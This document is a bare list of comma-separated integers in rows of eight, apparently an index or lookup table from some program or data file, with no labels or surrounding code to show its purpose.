5531, 2694, 5540, 5585, 2804, 5548, 5593, 5629,
2903, 5555, 5600, 5636, 5664, 2991, 5561, 5606,
5642, 5670, 5691, 3068, 5566, 5611, 5647, 5675,
5696, 5711, 3134, 3183, 3184, 3185, 3186, 3187,
3188, 3189, 260, 2553, 3227, 2674, 3227, 3228,
2784, 3227, 3228, 3229, 2883, 3227, 3228, 3229,
3230, 2971, 3227, 3228, 3229, 3230, 3231, 3048,
3227, 3228, 3229, 3230, 3231, 3232, 3114, 3227,
3228, 3229, 3230, 3231, 3232, 3233, 3169, 272,
272, 272, 272, 272, 272, 272, 272, 116,
176, 2567, 2688, 188, 2568, 5526, 2689, 2798,
2799, 200, 2569, 5527, 2690, 5536, 5581, 2800,
2897, 2898, 2899, 212, 2570, 5528, 2691, 5537,
5582, 2801, 5545, 5590, 5626, 2900, 2985, 2986,
2987, 2988, 224, 2571, 5529, 2692, 5538, 5583,
2802, 5546, 5591, 5627, 2901, 5553, 5598, 5634,
5662, 2989, 3062, 3063, 3064, 3065, 3066, 236,
2572, 5530, 2693, 5539, 5584, 2803, 5547, 5592,
5628, 2902, 5554, 5599, 5635, 5663, 2990, 5560,
5605, 5641, 5669, 5690, 3067, 3128, 3129, 3130,
3131, 3132, 3133, 248, 2573, 5531, 2694, 5540,
5585, 2804, 5548, 5593, 5629, 2903, 5555, 5600,
5636, 5664, 2991, 5561, 5606, 5642, 5670, 5691,
3068, 5566, 5611, 5647, 5675, 5696, 5711, 3134,
3183, 3184, 3185, 3186, 3187, 3188, 3189, 260,
2574, 5532, 2695, 5541, 5586, 2805, 5549, 5594,
5630, 2904, 5556, 5601, 5637, 5665, 2992, 5562,
5607, 5643, 5671, 5692, 3069, 5567, 5612, 5648,
5676, 5697, 5712, 3135, 5571, 5616, 5652, 5680,
5701, 5716, 1606, 3190, 3227, 3228, 3229, 3230,
3231, 3232, 3233, 3234, 272, 2564, 3260, 2685,
3260, 3261, 2795, 3260, 3261, 3262, 2894, 3260,
3261, 3262, 3263, 2982, 3260, 3261, 3262, 3263,
3264, 3059, 3260, 3261, 3262, 3263, 3264, 3265,
3125, 3260, 3261, 3262, 3263, 3264, 3265, 3266,
3180, 3260, 3261, 3262, 3263, 3264, 3265, 3266,
3267, 3224, 284, 284, 284, 284, 284, 284,
284, 284, 284, 128, 176, 287, 288, 188,
287, 2270, 288, 289, 289, 200, 287, 2270,
288, 2271, 2281, 289, 290, 290, 290, 212,
287, 2270, 288, 2271, 2281, 289, 2272, 2282,
2291, 290, 291, 291, 291, 291, 224, 287,
2270, 288, 2271, 2281, 289, 2272, 2282, 2291,
290, 2273, 2283, 2292, 2300, 291, 292, 292,
292, 292, 292, 236, 287, 2270, 288, 2271,
2281, 289, 2272, 2282, 2291, 290, 2273, 2283,
2292, 2300, 291, 2274, 2284, 2293, 2301, 2308,
292, 293, 293, 293, 293, 293, 293, 248,
287, 2270, 288, 2271, 2281, 289, 2272, 2282,
2291, 290, 2273, 2283, 2292, 2300, 291, 2274,
2284, 2293, 2301, 2308, 292, 2275, 2285, 2294,
2302, 2309, 2315, 293, 294, 294, 294, 294,
294, 294, 294, 260, 287, 2270, 288, 2271,
2281, 289, 2272, 2282, 2291, 290, 2273, 2283,
2292, 2300, 291, 2274, 2284, 2293, 2301, 2308,
292, 2275, 2285, 2294, 2302, 2309, 2315, 293,
2276, 2286, 2295, 2303, 2310, 2316, 2321, 294,
295, 295, 295, 295, 295, 295, 295, 295,
272, 287, 2270, 288, 2271, 2281, 289, 2272,
2282, 2291, 290, 2273, 2283, 2292, 2300, 291,
2274, 2284, 2293, 2301, 2308, 292, 2275, 2285,
2294, 2302, 2309, 2315, 293, 2276, 2286, 2295,
2303, 2310, 2316, 2321, 294, 2277, 2287, 2296,
2304, 2311, 2317, 2322, 2326, 295, 296, 296,
296, 296, 296, 296, 296, 296, 296, 284,
131, 131, 132, 131, 132, 133, 131, 132,
133, 134, 131, 132, 133, 134, 135, 131,
132, 133, 134, 135, 136, 131, 132, 133,
134, 135, 136, 137, 131, 132, 133, 134,
135, 136, 137, 138, 131, 132, 133, 134,
135, 136, 137, 138, 139, 131, 132, 133,
134, 135, 136, 137, 138, 139, 140, 11,
167, 179, 23, 12, 1610, 2468, 1676, 24,
168, 2479, 2600, 180, 191, 1742, 192, 35,
36, 13, 1611, 2469, 1677, 25, 1621, 3326,
3546, 1687, 2480, 3766, 2601, 1743, 1753, 37,
169, 2490, 2611, 181, 2491, 3986, 2612, 2721,
2722, 193, 203, 1808, 204, 1809, 1819, 205,
47, 48, 49, 14, 1612, 2470, 1678, 26,
1622, 3327, 3547, 1688, 2481, 3767, 2602, 1744,
1754, 38, 1631, 3336, 3556, 1697, 3381, 1600,
3601, 3776, 3821, 1763, 2492, 3987, 2613, 3996,
4041, 2723, 1810, 1820, 1829, 50, 170, 2501,
2622, 182, 2502, 4206, 2623, 2732, 2733, 194,
2503, 4207, 2624, 4216, 4261, 2734, 2831, 2832,
2833, 206, 215, 1874, 216, 1875, 1885, 217,
1876, 1886, 1895, 218, 59, 60, 61, 62,
15, 1613, 2471, 1679, 27, 1623, 3328, 3548,
1689, 2482, 3768, 2603, 1745, 1755, 39, 1632,
3337, 3557, 1698, 3382, 6186, 3602, 3777, 3822,
1764, 2493, 3988, 2614, 3997, 4042, 2724, 1811,
1821, 1830, 51, 1640, 3345, 3565, 1706, 3390,
6194, 3610, 3785, 3830, 1772, 3426, 6230, 3646,
6350, 1601, 3866, 4005, 4050, 4086, 1838, 2504,
4208, 2625, 4217, 4262, 2735, 4225, 4270, 4306,
2834, 1877, 1887, 1896, 1904, 63, 171, 2512,
2633, 183, 2513, 4426, 2634, 2743, 2744, 195,
2514, 4427, 2635, 4436, 4481, 2745, 2842, 2843,
2844, 207, 2515, 4428, 2636, 4437, 4482, 2746,
4445, 4490, 4526, 2845, 2930, 2931, 2932, 2933,
219, 227, 1940, 228, 1941, 1951, 229, 1942,
1952, 1961, 230, 1943, 1953, 1962, 1970, 231,
71, 72, 73, 74, 75, 16, 1614, 2472,
1680, 28, 1624, 3329, 3549, 1690, 2483, 3769,
2604, 1746, 1756, 40, 1633, 3338, 3558, 1699,
3383, 6187, 3603, 3778, 3823, 1765, 2494, 3989,
2615, 3998, 4043, 2725, 1812, 1822, 1831, 52,
1641, 3346, 3566, 1707, 3391, 6195, 3611, 3786,
3831, 1773, 3427, 6231, 3647, 6351, 6679, 3867,
4006, 4051, 4087, 1839, 2505, 4209, 2626, 4218,
4263, 2736, 4226, 4271, 4307, 2835, 1878, 1888,
1897, 1905, 64, 1648, 3353, 3573, 1714, 3398,
6202, 3618, 3793, 3838, 1780, 3434, 6238, 3654,
6358, 6686, 3874, 4013, 4058, 4094, 1846, 3462,
6266, 3682, 6386, 6714, 3902, 6470, 6798, 1602,
4122, 4233, 4278, 4314, 4342, 1912, 2516, 4429,
2637, 4438, 4483, 2747, 4446, 4491, 4527, 2846,
4453, 4498, 4534, 4562, 2934, 1944, 1954, 1963,
1971, 1978, 76, 172, 2523, 2644, 184, 2524,
4646, 2645, 2754, 2755, 196, 2525, 4647, 2646,
4656, 4701, 2756, 2853, 2854, 2855, 208, 2526,
4648, 2647, 4657, 4702, 2757, 4665, 4710, 4746,
2856, 2941, 2942, 2943, 2944, 220, 2527, 4649,
2648, 4658, 4703, 2758, 4666, 4711, 4747, 2857,
4673, 4718, 4754, 4782, 2945, 3018, 3019, 3020,
3021, 3022, 232, 239, 2006, 240, 2007, 2017,
241, 2008, 2018, 2027, 242, 2009, 2019, 2028,
2036, 243, 2010, 2020, 2029, 2037, 2044, 244,
83, 84, 85, 86, 87, 88, 17, 1615,
2473, 1681, 29, 1625, 3330, 3550, 1691, 2484,
3770, 2605, 1747, 1757, 41, 1634, 3339, 3559,
1700, 3384, 6188, 3604, 3779, 3824, 1766, 2495,
3990, 2616, 3999, 4044, 2726, 1813, 1823, 1832,
53, 1642, 3347, 3567, 1708, 3392, 6196, 3612,
3787, 3832, 1774, 3428, 6232, 3648, 6352, 6680,
3868, 4007, 4052, 4088, 1840, 2506, 4210, 2627,
4219, 4264, 2737, 4227, 4272, 4308, 2836, 1879,
1889, 1898, 1906, 65, 1649, 3354, 3574, 1715,
3399, 6203, 3619, 3794, 3839, 1781, 3435, 6239,
3655, 6359, 6687, 3875, 4014, 4059, 4095, 1847,
3463, 6267, 3683, 6387, 6715, 3903, 6471, 6799,
7008, 4123, 4234, 4279, 4315, 4343, 1913, 2517,
4430, 2638, 4439, 4484, 2748, 4447, 4492, 4528,
2847, 4454, 4499, 4535, 4563, 2935, 1945, 1955,
1964, 1972, 1979, 77, 1655, 3360, 3580, 1721,
3405, 6209, 3625, 3800, 3845, 1787, 3441, 6245,
3661, 6365, 6693, 3881, 4020, 4065, 4101, 1853,
3469, 6273, 3689, 6393, 6721, 3909, 6477, 6805,
7014, 4129, 4240, 4285, 4321, 4349, 1919, 3490,
6294, 3710, 6414, 6742, 3930, 6498, 6826, 7035,
4150, 6554, 6882, 7091, 1603, 4370, 4460, 4505,
4541, 4569, 4590, 1985, 2528, 4650, 2649, 4659,
4704, 2759, 4667, 4712, 4748, 2858, 4674, 4719,
4755, 4783, 2946, 4680, 4725, 4761, 4789, 4810,
3023, 2011, 2021, 2030, 2038, 2045, 2051, 89,
173, 2534, 2655, 185, 2535, 4866, 2656, 2765,
2766, 197, 2536, 4867, 2657, 4876, 4921, 2767,
2864, 2865, 2866, 209, 2537, 4868, 2658, 4877,
4922, 2768, 4885, 4930, 4966, 2867, 2952, 2953,
2954, 2955, 221, 2538, 4869, 2659, 4878, 4923,
2769, 4886, 4931, 4967, 2868, 4893, 4938, 4974,
5002, 2956, 3029, 3030, 3031, 3032, 3033, 233,
2539, 4870, 2660, 4879, 4924, 2770, 4887, 4932,
4968, 2869, 4894, 4939, 4975, 5003, 2957, 4900,
4945, 4981, 5009, 5030, 3034, 3095, 3096, 3097,
3098, 3099, 3100, 245, 251, 2072, 252, 2073,
2083, 253, 2074, 2084, 2093, 254, 2075, 2085,
2094, 2102, 255, 2076, 2086, 2095, 2103, 2110,
256, 2077, 2087, 2096, 2104, 2111, 2117, 257,
95, 96, 97, 98, 99, 100, 101, 18,
1616, 2474, 1682, 30, 1626, 3331, 3551, 1692,
2485, 3771, 2606, 1748, 1758, 42, 1635, 3340,
3560, 1701, 3385, 6189, 3605, 3780, 3825, 1767,
2496, 3991, 2617, 4000, 4045, 2727, 1814, 1824,
1833, 54, 1643, 3348, 3568, 1709, 3393, 6197,
3613, 3788, 3833, 1775, 3429, 6233, 3649, 6353,
6681, 3869, 4008, 4053, 4089, 1841, 2507, 4211,
2628, 4220, 4265, 2738, 4228, 4273, 4309, 2837,
1880, 1890, 1899, 1907, 66, 1650, 3355, 3575,
1716, 3400, 6204, 3620, 3795, 3840, 1782, 3436,
6240, 3656, 6360, 6688, 3876, 4015, 4060, 4096,
1848, 3464, 6268, 3684, 6388, 6716, 3904, 6472,
6800, 7009, 4124, 4235, 4280, 4316, 4344, 1914,
2518, 4431, 2639, 4440, 4485, 2749, 4448, 4493,
4529, 2848, 4455, 4500, 4536, 4564, 2936, 1946,
1956, 1965, 1973, 1980, 78, 1656, 3361, 3581,
1722, 3406, 6210, 3626, 3801, 3846, 1788, 3442,
6246, 3662, 6366, 6694, 3882, 4021, 4066, 4102,
1854, 3470, 6274, 3690, 6394, 6722, 3910, 6478,
6806, 7015, 4130, 4241, 4286, 4322, 4350, 1920,
3491, 6295, 3711, 6415, 6743, 3931, 6499, 6827,
7036, 4151, 6555, 6883, 7092, 7217, 4371, 4461,
4506, 4542, 4570, 4591, 1986, 2529, 4651, 2650,
4660, 4705, 2760, 4668, 4713, 4749, 2859, 4675,
4720, 4756, 4784, 2947, 4681, 4726, 4762, 4790,
4811, 3024, 2012, 2022, 2031, 2039, 2046, 2052,
90, 1661, 3366, 3586, 1727, 3411, 6215, 3631,
3806, 3851, 1793, 3447, 6251, 3667, 6371, 6699,
3887, 4026, 4071, 4107, 1859, 3475, 6279, 3695,
6399, 6727, 3915, 6483, 6811, 7020, 4135, 4246,
4291, 4327, 4355, 1925, 3496, 6300, 3716, 6420,
6748, 3936, 6504, 6832, 7041, 4156, 6560, 6888,
7097, 7222, 4376, 4466, 4511, 4547, 4575, 4596,
1991, 3511, 6315, 3731, 6435, 6763, 3951, 6519,
6847, 7056, 4171, 6575, 6903, 7112, 7237, 4391,
6610, 6938, 7147, 7272, 1604, 4611, 4686, 4731,
4767, 4795, 4816, 4831, 2057, 2540, 4871, 2661,
4880, 4925, 2771, 4888, 4933, 4969, 2870, 4895,
4940, 4976, 5004, 2958, 4901, 4946, 4982, 5010,
5031, 3035, 4906, 4951, 4987, 5015, 5036, 5051,
3101, 2078, 2088, 2097, 2105, 2112, 2118, 2123,
102, 174, 2545, 2666, 186, 2546, 5086, 2667,
2776, 2777, 198, 2547, 5087, 2668, 5096, 5141,
2778, 2875, 2876, 2877, 210, 2548, 5088, 2669,
5097, 5142, 2779, 5105, 5150, 5186, 2878, 2963,
2964, 2965, 2966, 222, 2549, 5089, 2670, 5098,
5143, 2780, 5106, 5151, 5187, 2879, 5113, 5158,
5194, 5222, 2967, 3040, 3041, 3042, 3043, 3044,
234, 2550, 5090, 2671, 5099, 5144, 2781, 5107,
5152, 5188, 2880, 5114, 5159, 5195, 5223, 2968,
5120, 5165, 5201, 5229, 5250, 3045, 3106, 3107,
3108, 3109, 3110, 3111, 246, 2551, 5091, 2672,
5100, 5145, 2782, 5108, 5153, 5189, 2881, 5115,
5160, 5196, 5224, 2969, 5121, 5166, 5202, 5230,
5251, 3046, 5126, 5171, 5207, 5235, 5256, 5271,
3112, 3161, 3162, 3163, 3164, 3165, 3166, 3167,
258, 263, 2138, 264, 2139, 2149, 265, 2140,
2150, 2159, 266, 2141, 2151, 2160, 2168, 267,
2142, 2152, 2161, 2169, 2176, 268, 2143, 2153,
2162, 2170, 2177, 2183, 269, 2144, 2154, 2163,
2171, 2178, 2184, 2189, 270, 107, 108, 109,
110, 111, 112, 113, 114, 19, 1617, 2475,
1683, 31, 1627, 3332, 3552, 1693, 2486, 3772,
2607, 1749, 1759, 43, 1636, 3341, 3561, 1702,
3386, 6190, 3606, 3781, 3826, 1768, 2497, 3992,
2618, 4001, 4046, 2728, 1815, 1825, 1834, 55,
1644, 3349, 3569, 1710, 3394, 6198, 3614, 3789,
3834, 1776, 3430, 6234, 3650, 6354, 6682, 3870,
4009, 4054, 4090, 1842, 2508, 4212, 2629, 4221,
4266, 2739, 4229, 4274, 4310, 2838, 1881, 1891,
1900, 1908, 67, 1651, 3356, 3576, 1717, 3401,
6205, 3621, 3796, 3841, 1783, 3437, 6241, 3657,
6361, 6689, 3877, 4016, 4061, 4097, 1849, 3465,
6269, 3685, 6389, 6717, 3905, 6473, 6801, 7010,
4125, 4236, 4281, 4317, 4345, 1915, 2519, 4432,
2640, 4441, 4486, 2750, 4449, 4494, 4530, 2849,
4456, 4501, 4537, 4565, 2937, 1947, 1957, 1966,
1974, 1981, 79, 1657, 3362, 3582, 1723, 3407,
6211, 3627, 3802, 3847, 1789, 3443, 6247, 3663,
6367, 6695, 3883, 4022, 4067, 4103, 1855, 3471,
6275, 3691, 6395, 6723, 3911, 6479, 6807, 7016,
4131, 4242, 4287, 4323, 4351, 1921, 3492, 6296,
3712, 6416, 6744, 3932, 6500, 6828, 7037, 4152,
6556, 6884, 7093, 7218, 4372, 4462, 4507, 4543,
4571, 4592, 1987, 2530, 4652, 2651, 4661, 4706,
2761, 4669, 4714, 4750, 2860, 4676, 4721, 4757,
4785, 2948, 4682, 4727, 4763, 4791, 4812, 3025,
2013, 2023, 2032, 2040, 2047, 2053, 91, 1662,
3367, 3587, 1728, 3412, 6216, 3632, 3807, 3852,
1794, 3448, 6252, 3668, 6372, 6700, 3888, 4027,
4072, 4108, 1860, 3476, 6280, 3696, 6400, 6728,
3916, 6484, 6812, 7021, 4136, 4247, 4292, 4328,
4356, 1926, 3497, 6301, 3717, 6421, 6749, 3937,
6505, 6833, 7042, 4157, 6561, 6889, 7098, 7223,
4377, 4467, 4512, 4548, 4576, 4597, 1992, 3512,
6316, 3732, 6436, 6764, 3952, 6520, 6848, 7057,
4172, 6576, 6904, 7113, 7238, 4392, 6611, 6939,
7148, 7273, 7342, 4612, 4687, 4732, 4768, 4796,
4817, 4832, 2058, 2541, 4872, 2662, 4881, 4926,
2772, 4889, 4934, 4970, 2871, 4896, 4941, 4977,
5005, 2959, 4902, 4947, 4983, 5011, 5032, 3036,
4907, 4952, 4988, 5016, 5037, 5052, 3102, 2079,
2089, 2098, 2106, 2113, 2119, 2124, 103, 1666,
3371, 3591, 1732, 3416, 6220, 3636, 3811, 3856,
1798, 3452, 6256, 3672, 6376, 6704, 3892, 4031,
4076, 4112, 1864, 3480, 6284, 3700, 6404, 6732,
3920, 6488, 6816, 7025, 4140, 4251, 4296, 4332,
4360, 1930, 3501, 6305, 3721, 6425, 6753, 3941,
6509, 6837, 7046, 4161, 6565, 6893, 7102, 7227,
4381, 4471, 4516, 4552, 4580, 4601, 1996, 3516,
6320, 3736, 6440, 6768, 3956, 6524, 6852, 7061,
4176, 6580, 6908, 7117, 7242, 4396, 6615, 6943,
7152, 7277, 7346, 4616, 4691, 4736, 4772, 4800,
4821, 4836, 2062, 3526, 6330, 3746, 6450, 6778,
3966, 6534, 6862, 7071, 4186, 6590, 6918, 7127,
7252, 4406, 6625, 6953, 7162, 7287, 7356, 4626,
6645, 6973, 7182, 7307, 7376, 1605, 4846, 4911,
4956, 4992, 5020, 5041, 5056, 5066, 2128, 2552,
5092, 2673, 5101, 5146, 2783, 5109, 5154, 5190,
2882, 5116, 5161, 5197, 5225, 2970, 5122, 5167,
5203, 5231, 5252, 3047, 5127, 5172, 5208, 5236,
5257, 5272, 3113, 5131, 5176, 5212, 5240, 5261,
5276, 5286, 3168, 2145, 2155, 2164, 2172, 2179,
2185, 2190, 2194, 115, 175, 2556, 2677, 187,
2557, 5306, 2678, 2787, 2788, 199, 2558, 5307,
2679, 5316, 5361, 2789, 2886, 2887, 2888, 211,
2559, 5308, 2680, 5317, 5362, 2790, 5325, 5370,
5406, 2889, 2974, 2975, 2976, 2977, 223, 2560,
5309, 2681, 5318, 5363, 2791, 5326, 5371, 5407,
2890, 5333, 5378, 5414, 5442, 2978, 3051, 3052,
3053, 3054, 3055, 235, 2561, 5310, 2682, 5319,
5364, 2792, 5327, 5372, 5408, 2891, 5334, 5379,
5415, 5443, 2979, 5340, 5385, 5421, 5449, 5470,
3056, 3117, 3118, 3119, 3120, 3121, 3122, 247,
2562, 5311, 2683, 5320, 5365, 2793, 5328, 5373,
5409, 2892, 5335, 5380, 5416, 5444, 2980, 5341,
5386, 5422, 5450, 5471, 3057, 5346, 5391, 5427,
5455, 5476, 5491, 3123, 3172, 3173, 3174, 3175,
3176, 3177, 3178, 259, 2563, 5312, 2684, 5321,
5366, 2794, 5329, 5374, 5410, 2893, 5336, 5381,
5417, 5445, 2981, 5342, 5387, 5423, 5451, 5472,
3058, 5347, 5392, 5428, 5456, 5477, 5492, 3124,
5351, 5396, 5432, 5460, 5481, 5496, 5506, 3179,
3216, 3217, 3218, 3219, 3220, 3221, 3222, 3223,
271, 275, 2204, 276, 2205, 2215, 277, 2206,
2216, 2225, 278, 2207, 2217, 2226, 2234, 279,
2208, 2218, 2227, 2235, 2242, 280, 2209, 2219,
2228, 2236, 2243, 2249, 281, 2210, 2220, 2229,
2237, 2244, 2250, 2255, 282, 2211, 2221, 2230,
2238, 2245, 2251, 2256, 2260, 283, 119, 120,
121, 122, 123, 124, 125, 126, 127, 20,
1618, 2476, 1684, 32, 1628, 3333, 3553, 1694,
2487, 3773, 2608, 1750, 1760, 44, 1637, 3342,
3562, 1703, 3387, 6191, 3607, 3782, 3827, 1769,
2498, 3993, 2619, 4002, 4047, 2729, 1816, 1826,
1835, 56, 1645, 3350, 3570, 1711, 3395, 6199,
3615, 3790, 3835, 1777, 3431, 6235, 3651, 6355,
6683, 3871, 4010, 4055, 4091, 1843, 2509, 4213,
2630, 4222, 4267, 2740, 4230, 4275, 4311, 2839,
1882, 1892, 1901, 1909, 68, 1652, 3357, 3577,
1718, 3402, 6206, 3622, 3797, 3842, 1784, 3438,
6242, 3658, 6362, 6690, 3878, 4017, 4062, 4098,
1850, 3466, 6270, 3686, 6390, 6718, 3906, 6474,
6802, 7011, 4126, 4237, 4282, 4318, 4346, 1916,
2520, 4433, 2641, 4442, 4487, 2751, 4450, 4495,
4531, 2850, 4457, 4502, 4538, 4566, 2938, 1948,
1958, 1967, 1975, 1982, 80, 1658, 3363, 3583,
1724, 3408, 6212, 3628, 3803, 3848, 1790, 3444,
6248, 3664, 6368, 6696, 3884, 4023, 4068, 4104,
1856, 3472, 6276, 3692, 6396, 6724, 3912, 6480,
6808, 7017, 4132, 4243, 4288, 4324, 4352, 1922,
3493, 6297, 3713, 6417, 6745, 3933, 6501, 6829,
7038, 4153, 6557, 6885, 7094, 7219, 4373, 4463,
4508, 4544, 4572, 4593, 1988, 2531, 4653, 2652,
4662, 4707, 2762, 4670, 4715, 4751, 2861, 4677,
4722, 4758, 4786, 2949, 4683, 4728, 4764, 4792,
4813, 3026, 2014, 2024, 2033, 2041, 2048, 2054,
92, 1663, 3368, 3588, 1729, 3413, 6217, 3633,
3808, 3853, 1795, 3449, 6253, 3669, 6373, 6701,
3889, 4028, 4073, 4109, 1861, 3477, 6281, 3697,
6401, 6729, 3917, 6485, 6813, 7022, 4137, 4248,
4293, 4329, 4357, 1927, 3498, 6302, 3718, 6422,
6750, 3938, 6506, 6834, 7043, 4158, 6562, 6890,
7099, 7224, 4378, 4468, 4513, 4549, 4577, 4598,
1993, 3513, 6317, 3733, 6437, 6765, 3953, 6521,
6849, 7058, 4173, 6577, 6905, 7114, 7239, 4393,
6612, 6940, 7149, 7274, 7343, 4613, 4688, 4733,
4769, 4797, 4818, 4833, 2059, 2542, 4873, 2663,
4882, 4927, 2773, 4890, 4935, 4971, 2872, 4897,
4942, 4978, 5006, 2960, 4903, 4948, 4984, 5012,
5033, 3037, 4908, 4953, 4989, 5017, 5038, 5053,
3103, 2080, 2090, 2099, 2107, 2114, 2120, 2125,
104, 1667, 3372, 3592, 1733, 3417, 6221, 3637,
3812, 3857, 1799, 3453, 6257, 3673, 6377, 6705,
3893, 4032, 4077, 4113, 1865, 3481, 6285, 3701,
6405, 6733, 3921, 6489, 6817, 7026, 4141, 4252,
4297, 4333, 4361, 1931, 3502, 6306, 3722, 6426,
6754, 3942, 6510, 6838, 7047, 4162, 6566, 6894,
7103, 7228, 4382, 4472, 4517, 4553, 4581, 4602,
1997, 3517, 6321, 3737, 6441, 6769, 3957, 6525,
6853, 7062, 4177, 6581, 6909, 7118, 7243, 4397,
6616, 6944, 7153, 7278, 7347, 4617, 4692, 4737,
4773, 4801, 4822, 4837, 2063, 3527, 6331, 3747,
6451, 6779, 3967, 6535, 6863, 7072, 4187, 6591,
6919, 7128, 7253, 4407, 6626, 6954, 7163, 7288,
7357, 4627, 6646, 6974, 7183, 7308, 7377, 7411,
4847, 4912, 4957, 4993, 5021, 5042, 5057, 5067,
2129, 2553, 5093, 2674, 5102, 5147, 2784, 5110,
5155, 5191, 2883, 5117, 5162, 5198, 5226, 2971,
5123, 5168, 5204, 5232, 5253, 3048, 5128, 5173,
5209, 5237, 5258, 5273, 3114, 5132, 5177, 5213,
5241, 5262, 5277, 5287, 3169, 2146, 2156, 2165,
2173, 2180, 2186, 2191, 2195, 116, 1670, 3375,
3595, 1736, 3420, 6224, 3640, 3815, 3860, 1802,
3456, 6260, 3676, 6380, 6708, 3896, 4035, 4080,
4116, 1868, 3484, 6288, 3704, 6408, 6736, 3924,
6492, 6820, 7029, 4144, 4255, 4300, 4336, 4364,
1934, 3505, 6309, 3725, 6429, 6757, 3945, 6513,
6841, 7050, 4165, 6569, 6897, 7106, 7231, 4385,
4475, 4520, 4556, 4584, 4605, 2000, 3520, 6324,
3740, 6444, 6772, 3960, 6528, 6856, 7065, 4180,
6584, 6912, 7121, 7246, 4400, 6619, 6947, 7156,
7281, 7350, 4620, 4695, 4740, 4776, 4804, 4825,
4840, 2066, 3530, 6334, 3750, 6454, 6782, 3970,
6538, 6866, 7075, 4190, 6594, 6922, 7131, 7256,
4410, 6629, 6957, 7166, 7291, 7360, 4630, 6649,
6977, 7186, 7311, 7380, 7414, 4850, 4915, 4960,
4996, 5024, 5045, 5060, 5070, 2132, 3536, 6340,
3756, 6460, 6788, 3976, 6544, 6872, 7081, 4196,
6600, 6928, 7137, 7262, 4416, 6635, 6963, 7172,
7297, 7366, 4636, 6655, 6983, 7192, 7317, 7386,
7420, 4856, 1607, 1607, 1607, 1607, 1607, 1607,
1606, 1607, 5135, 5180, 5216, 5244, 5265, 5280,
5290, 1607, 2198, 2564, 5313, 2685, 5322, 5367,
2795, 5330, 5375, 5411, 2894, 5337, 5382, 5418,
5446, 2982, 5343, 5388, 5424, 5452, 5473, 3059,
5348, 5393, 5429, 5457, 5478, 5493, 3125, 5352,
5397, 5433, 5461, 5482, 5497, 5507, 3180, 5355,
5400, 5436, 5464, 5485, 5500, 5510, 1607, 3224,
2212, 2222, 2231, 2239, 2246, 2252, 2257, 2261,
2264, 128, 176, 2567, 2688, 188, 2568, 5526,
2689, 2798, 2799, 200, 2569, 5527, 2690, 5536,
5581, 2800, 2897, 2898, 2899, 212, 2570, 5528,
2691, 5537, 5582, 2801, 5545, 5590, 5626, 2900,
2985, 2986, 2987, 2988, 224, 2571, 5529, 2692,
5538, 5583, 2802, 5546, 5591, 5627, 2901, 5553,
5598, 5634, 5662, 2989, 3062, 3063, 3064, 3065,
3066, 236, 2572, 5530, 2693, 5539, 5584, 2803,
5547, 5592, 5628, 2902, 5554, 5599, 5635, 5663,
2990, 5560, 5605, 5641, 5669, 5690, 3067, 3128,
3129, 3130, 3131, 3132, 3133, 248, 2573, 5531,
2694, 5540, 5585, 2804, 5548, 5593, 5629, 2903,
5555, 5600, 5636, 5664, 2991, 5561, 5606, 5642,
5670, 5691, 3068, 5566, 5611, 5647, 5675, 5696,
5711, 3134, 3183, 3184, 3185, 3186, 3187, 3188,
3189, 260, 2574, 5532, 2695, 5541, 5586, 2805,
5549, 5594, 5630, 2904, 5556, 5601, 5637, 5665,
2992, 5562, 5607, 5643, 5671, 5692, 3069, 5567,
5612, 5648, 5676, 5697, 5712, 3135, 5571, 5616,
5652, 5680, 5701, 5716, 5726, 3190, 3227, 3228,
3229, 3230, 3231, 3232, 3233, 3234, 272, 2575,
5533, 2696, 5542, 5587, 2806, 5550, 5595, 5631,
2905, 5557, 5602, 5638, 5666, 2993, 5563, 5608,
5644, 5672, 5693, 3070, 5568, 5613, 5649, 5677,
5698, 5713, 3136, 5572, 5617, 5653, 5681, 5702,
5717, 5727, 3191, 5575, 5620, 5656, 5684, 5705,
5720, 5730, 1607, 3235, 3260, 3261, 3262, 3263,
3264, 3265, 3266, 3267, 3268, 284, 287, 2270,
288, 2271, 2281, 289, 2272, 2282, 2291, 290,
2273, 2283, 2292, 2300, 291, 2274, 2284, 2293,
2301, 2308, 292, 2275, 2285, 2294, 2302, 2309,
2315, 293, 2276, 2286, 2295, 2303, 2310, 2316,
2321, 294, 2277, 2287, 2296, 2304, 2311, 2317,
2322, 2326, 295, 2278, 2288, 2297, 2305, 2312,
2318, 2323, 2327, 2330, 296, 131, 132, 133,
134, 135, 136, 137, 138, 139, 140, 21,
177, 2477, 189, 33, 177, 2578, 2699, 189,
2488, 2809, 2609, 201, 201, 45, 177, 2578,
2699, 189, 2579, 5746, 2700, 2809, 2810, 201,
2499, 2908, 2620, 2908, 2909, 2730, 213, 213,
213, 57, 177, 2578, 2699, 189, 2579, 5746,
2700, 2809, 2810, 201, 2580, 5747, 2701, 5756,
5801, 2811, 2908, 2909, 2910, 213, 2510, 2996,
2631, 2996, 2997, 2741, 2996, 2997, 2998, 2840,
225, 225, 225, 225, 69, 177, 2578, 2699,
189, 2579, 5746, 2700, 2809, 2810, 201, 2580,
5747, 2701, 5756, 5801, 2811, 2908, 2909, 2910,
213, 2581, 5748, 2702, 5757, 5802, 2812, 5765,
5810, 5846, 2911, 2996, 2997, 2998, 2999, 225,
2521, 3073, 2642, 3073, 3074, 2752, 3073, 3074,
3075, 2851, 3073, 3074, 3075, 3076, 2939, 237,
237, 237, 237, 237, 81, 177, 2578, 2699,
189, 2579, 5746, 2700, 2809, 2810, 201, 2580,
5747, 2701, 5756, 5801, 2811, 2908, 2909, 2910,
213, 2581, 5748, 2702, 5757, 5802, 2812, 5765,
5810, 5846, 2911, 2996, 2997, 2998, 2999, 225,
2582, 5749, 2703, 5758, 5803, 2813, 5766, 5811,
5847, 2912, 5773, 5818, 5854, 5882, 3000, 3073,
3074, 3075, 3076, 3077, 237, 2532, 3139, 2653,
3139, 3140, 2763, 3139, 3140, 3141, 2862, 3139,
3140, 3141, 3142, 2950, 3139, 3140, 3141, 3142,
3143, 3027, 249, 249, 249, 249, 249, 249,
93, 177, 2578, 2699, 189, 2579, 5746, 2700,
2809, 2810, 201, 2580, 5747, 2701, 5756, 5801,
2811, 2908, 2909, 2910, 213, 2581, 5748, 2702,
5757, 5802, 2812, 5765, 5810, 5846, 2911, 2996,
2997, 2998, 2999, 225, 2582, 5749, 2703, 5758,
5803, 2813, 5766, 5811, 5847, 2912, 5773, 5818,
5854, 5882, 3000, 3073, 3074, 3075, 3076, 3077,
237, 2583, 5750, 2704, 5759, 5804, 2814, 5767,
5812, 5848, 2913, 5774, 5819, 5855, 5883, 3001,
5780, 5825, 5861, 5889, 5910, 3078, 3139, 3140,
3141, 3142, 3143, 3144, 249, 2543, 3194, 2664,
